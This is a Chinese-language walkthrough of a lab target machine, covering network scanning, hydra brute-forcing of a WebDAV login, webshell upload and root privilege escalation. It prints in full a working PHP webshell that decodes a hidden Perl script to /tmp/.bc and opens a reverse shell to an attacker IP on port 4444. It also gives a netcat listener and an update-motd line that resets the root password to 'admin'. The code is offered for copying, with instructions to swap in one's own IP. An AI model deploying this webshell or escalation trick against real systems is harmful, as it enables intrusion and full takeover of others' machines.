1.查找本机ip
输入ifconfig
2.寻找靶机
kali网段:192.168.19.0/24
namp 192.168.19.0/24 知道一个IP 192.168.19.137 端口22 80(每一个电脑靶机IP不一样)
3.在浏览器输入靶机IP,发现是图片
查看页面源代码看是否有有价值的信息
4.如果源代码没有重要信息,扫描整个网络。
发现上传协议webdav,Webdav一种文件传输协议
5.cewl爬行网站创建密码字典
渗透该协议,发现需要密码
6.暴力破解密码
hydra是一个自动化的爆破工具,暴力破解密码,是一个被迫神器。
语法:Hydra 参数 IP 服务
-l login小写,指定用户名进行破解
-L flie 指定用户名破解·1
-p 小写 小写,指定密码破解,少用,一般是采用密码字典
-P 大写,指定密码字典
注:这里的P和L都是大写
7.在网页中打开http://192.168.19.137/webdav/webshell.php
输入刚刚破解出来的密码
并且同时把账号密码输入到刚刚的命令中。
8.下载webshell
<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.145.128";
$yourport = '4444';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
这里给大家安利好了,但要注意把里面的ip改成自己本机的IP。
然后使用put命令进入
9.打开监视
nc -lvvp 4444 这个过程稍微有一点久,但大家的电脑应该会很快,我的比较老了
反弹shell,执行下面命令进入python交互式
python3 -c 'import pty;pty.spawn("/bin/bash")'
10.BF解码
当我们进入cat hell.sh会发现有一个弥明之众暗示的特殊符号
--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.
在虚拟机中打开浏览器输入网址
http://www.splitbrain.org/services/ook
密码为:chitragupt
先尝试第一个账号referno
发现第一个flag
12.mot提权获得第二个flag
Motd提权
修改文件 、etc/update-motd.d/00-hradcr
1. 进入到文件夹; /etc/update-motd.d/
2. 修改文件: echo 'echo "root:admin" | sudo chpasswd' >> 00-header
3. 重新登陆
4. su root
找到第二个flag,圆满完成!!!